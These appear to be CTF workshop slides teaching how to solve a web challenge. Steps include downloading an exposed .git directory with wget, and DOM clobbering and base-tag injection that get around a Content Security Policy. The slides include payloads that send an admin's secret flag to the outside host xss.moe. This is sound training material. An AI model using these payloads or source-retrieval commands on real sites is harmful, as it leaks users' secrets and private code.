Scope ‣ What does "Easy" mean? Beginner => { here! } => Intermediate ‣ I hope this event will be the next step for beginners. ‣ Deeper, broader, and more detailed than CTF for Beginners. Hash tag => #katagaitaiCTF

First of all ‣ Let's access the target web site! ‣ https://goo.gl/qNjMfD ‣ For technical reasons, you should use Chrome (or a Chromium-based browser). ‣ In this lecture, I use Google Chrome for the examples.

Let's see the features ‣ Create an account and log in

Let's see the features ‣ Users can chat with some cows…

Let's see the features ‣ It seems impossible to get a premium account

Let's see the features ‣ Another feature: a form for reporting problems

Let's see the features ‣ All features of this site ‣ Cower View - displays all on-line cows ‣ Chatting page - chat with the respective cows ‣ Reporting page - the form to report problems ‣ Then, what shall we do? ‣ There should be some vulnerabilities. ‣ This site has an XSS. ‣ Can you find it?

Reporting Page ‣ When you see a page that sends a report to the admin, an XSSer must think "There may be some XSS here." ‣ You may ask "How did you know that?" ‣ There is no reason; the XSS is just there.

Where's the flag?

Investigation 1 ‣ You have 20 minutes! ‣ Find where the flag is. ‣ Hint: the source code knows everything. ‣ You know many ways to get the source code: RCE, path traversal, and so on.

Review ‣ The first thing you have to do is gather information. ‣ Whois information, DNS records, HTTP headers, system error messages, and so on. ‣ Sometimes hidden pages are listed in /robots.txt. ‣ It isn't a good idea to hide something by listing it in robots.txt. ‣ robots.txt is open to everyone on the Internet (of course, it's intended to be read by crawlers).

How to get the sources ‣ Use wget to download the .git directory. `wget -r --no-check-certificate -erobots=off https://wildwildweb.fluxfingers.net:1401/.git/` ‣ After downloading it, use git to restore the source code locally.

How to get the sources ‣ Run `git status` and confirm that the directory was downloaded properly (it will list the working-tree files as deleted, because only .git was fetched).

How to get the sources ‣ Run `git reset --hard` to restore the missing files from the repository objects.

Check the config ‣ The flag string is defined as a constant in the config file: `// change this` `define('FLAG', 'XXX');` `define('SALT', 'XXX');` ‣ So we need to find where this constant is used in the source code. ‣ It's a simple task, just use grep: `grep -e FLAG $(find . -name '*.php')`

Grep result ‣ The flag is used in premium.php. ‣ So let's look into this file next.

premium.php ‣ This API is called from the chat page. ‣ In a later step we'll get into the client-side code.

Time to XSS

Investigation 2 ‣ XSS will be needed to capture the flag. ‣ Basically, in a CTF you have to find the vulnerabilities from scratch. ‣ You have 25 minutes! ‣ Find a useful one.

Review ‣ Could you find a good one? ‣ Some tags work on /?p=chat#<s>XSS?</s> ‣ However, could you run alert('XSS') on this page? ‣ There's something strange about this site, right?

Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.

What's this? =====> Content Security Policy

What did CSP do? ‣ Our XSS code is injected into an HTML context ‣ So we have to use inline scripts to execute arbitrary code on the page ‣ However… ‣ CSP blocks executing inline scripts such as <img src=x onerror=alert(1)> ‣ I gave a talk about CSP; refer to that too ‣ http://www.slideshare.net/yagihashoo/cspfxos

So, what's the plan?

What can I do? ‣ CSP evasion is out of scope today. ‣ It's too difficult to deal with in a short time. ‣ The policy on this site has no evident flaw. ‣ HTML tag injection is still possible under the CSP. ‣ Some ordinary HTML tags will give us the flag today. ‣ So today let's learn a non-ordinary XSS.

HTML Tag Injection ‣ Generally it's used as a synonym for XSS. ‣ It's simple: just inject some HTML tags. ‣ Today I'll introduce two good HTML tag injection attack methods. ‣ Use them and get the flag.

What's DOM Clobbering? ‣ You know the DOM is really messy ‣ Not only the DOM; the Web has been a mess for a long time. ‣ There should be a solid border between the HTML document and the JavaScript code. ‣ Implicit access to the JavaScript world from the HTML world should be forbidden. ‣ However, for compatibility reasons, it can happen and lead to attacks on the system. Today let's use it. ‣ DOM Clobbering - The Spanner ‣ http://www.thespanner.co.uk/2013/05/16/dom-clobbering/

What's DOM Clobbering? ‣ The DOM tree is constructed automatically as the document is parsed. ‣ When the DOM tree is constructed, some elements (forms and other named elements) are also exposed as properties in the JavaScript world (on window and document). ‣ That is based on the name or id attribute of the element. ‣ So elements with a name or id exist in the JavaScript world from the start, and can shadow the built-in properties with the same name.

What's DOM Clobbering? ‣ By overriding document.* objects, we can cause an error intentionally. ‣ You may think "Is that all?" ‣ It's trivial, but it has a big effect on HotCows Dating.

The feature of the base tag ‣ The base tag defines the base URI for the relative paths in the page. ‣ It affects both tags and code. ‣ Just like below: <!-- The page is on "http://xss.moe/base.html" --> <base href="http://sqli.moe/"> <a href="foo.html">foo</a> ⇒ links to sqli.moe/foo.html <script>location.href="bar.html"</script> ⇒ moves to sqli.moe/bar.html ‣ It cannot be used to introduce javascript: URLs and the like (probably). ‣ So it's not useful for XSS by itself

What happens? ‣ Information leakage ‣ If a request with URL parameters occurs on a page where a malicious base tag has been injected, those URL parameters are sent to the malicious server. <base href="http://xss.moe/this_is_injected/"> <a href="foo.php?some_secret_info=XXX">link</a> ‣ In this example, the link refers to the malicious domain xss.moe. ‣ As a result, the some_secret_info parameter leaks to another server. ‣ Referers too! ‣ In some situations, the HTTP Referer will also leak

Exploitation 1 ‣ Use DOM clobbering and capture the flag. ‣ You have 30 minutes!

Chase the flag ‣ Use the developer tools ‣ command + option + I (macOS) ‣ ctrl + shift + I (Windows/Linux) ‣ All web accesses are listed on the Network tab ‣ /?api=premium.php is the one we saw beforehand

Chase the flag ‣ Let's find the code that issues the request to premium.php ‣ Open the Sources tab and browse /js/pages/chat.js ‣ Search for the phrase premium.php ‣ It's at line 128 ‣ It's called in the page.getPremium method ‣ So the next target is this method

Chase the flag ‣ The result of page.getPremium() is stored in the page.firstMessage function at line 139: premium = page.getPremium(); ‣ And it's immediately split into other variables: has_premium = premium['success']; premium_id = premium['message']; ‣ Finally, the flag is in premium_id ‣ What is premium_id used for?

Chase the flag ‣ Search for premium_id ‣ It's at line 207: message = cow_name + ((has_premium) ? ' (' + premium_id + ')' : ''); ‣ This message variable is used in `temp.assign(message, 'msg');` ‣ What's temp? ‣ And notice that the `var` keyword is not used at all in this code!

Chase the flag ‣ temp is everywhere in this code ‣ It's a global variable, so every function can overwrite it ‣ And in each method it keeps whatever value it had before being overwritten ‣ Moreover, this object has a method named assign. ‣ What if this temp variable is the location object…?

Chase the flag ‣ demo

Chase the flag ‣ The flag is displayed on the chat page if the user has a premium account. ‣ premium.php returns the flag if the user has a premium account. ‣ The JavaScript on the chat page displays the value premium.php returns. ‣ So by using the XSS on the chat page, we can acquire the flag.

Think about the scenario ‣ There is an XSS on the chat page. ‣ The parameter that names the destination (the cow to chat with) is vulnerable. ‣ The site has a reporting page and the admin may read the reports. ‣ And the admin may start a conversation with the reporter on the chat page. ‣ So the admin types the reporter's name into the chat page. ‣ That fires our XSS code.

Let's clobber the DOM! ‣ At first, the temp variable points to the location object ‣ Keep stepping into the next function calls ‣ It changes from the location object into a Template object in the page.view function at line 165: temp = new Template('message.html'); ‣ The next function call is page.firstMessage, which has the code that displays the flag on the page ‣ Of course, that function doesn't redefine temp.

Let's clobber the DOM! ‣ Do you remember what DOM clobbering can do? ‣ Override document.* and cause an error ‣ What if the code calls a document.* method before temp is overwritten with the Template object…? ‣ If that happens in the page.view function, temp remains the location object in the page.firstMessage function. ‣ And location.assign will be called with the flag.

Let's clobber the DOM! ‣ document.getElementById is called at line 146, before temp is overwritten. ‣ That's awesome: we can clobber document.getElementById and cause an error. ‣ After the error occurs, the rest of the code in page.view is not executed. ‣ That code is skipped, but page.firstMessage is still called.

Let's clobber the DOM! ‣ Let's prove the concept works. ‣ Set a breakpoint at line 146: btn_logout = document.getElementById('btn-logout'); ‣ Access /?p=chat#<form name=getElementById></form> ‣ Step into the next function call from the breakpoint. ‣ An error occurs at line 146 ‣ When you resume script execution, you end up at /<form name=getElementById></form>.

Finally ‣ It's proved that location.assign is called with location.hash.slice(1) (followed by the premium id). ‣ So a location.hash like the one below redirects the browser to xss.moe. ‣ When the admin, who has the premium account, opens it, the admin's browser is redirected to xss.moe with the flag in the URL: ‣ #http://xss.moe/<form name=getElementById></form>

Let's clobber the DOM! ‣ demo

Exploitation 2 ‣ Use base tag injection and capture the flag. ‣ I'll show you this one without an exercise.

Review ‣ The steps are the same as before. ‣ Cause an error and make temp remain the location object. ‣ In this example, CSP becomes our ally.

Review ‣ The page uses a relative path to fetch the template file. ‣ So if a base tag is injected, we can change the request destination. ‣ Remember the CSP policy ‣ It has a rule `connect-src 'self'` that restricts XHR requests to the same origin. ‣ If the destination of the request for the template is another origin, a CSP violation occurs and it causes an error.

Review ‣ Whichever URL you use will work. ‣ Because anything other than the same origin causes a CSP violation and an error. ‣ So a location.hash like the one below will also redirect the admin's browser to xss.moe with the flag. ‣ #http://xss.moe/<base href=http://foo.bar>